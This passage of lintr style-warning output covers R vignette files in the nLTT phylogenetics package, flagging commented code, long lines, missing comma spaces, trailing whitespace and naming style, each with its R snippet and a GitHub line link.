^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:86:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L86) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:89:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L89) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:93:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L93) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:95:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L95) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:97:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L97) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:100:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L100) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:104:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L104) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:105:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L105) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:108:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L108) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:112:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L112) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:116:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L116) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:41:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:120:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L120) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:42:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:123:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L123) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L124) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:124:129:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L128) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:128:102:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:131:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L131) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:140:53:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:143:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L143) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:147:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L147) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L148) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:148:129:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:54:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:102:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:154:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_get_nltt_values.R#L154) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L10) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:21:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 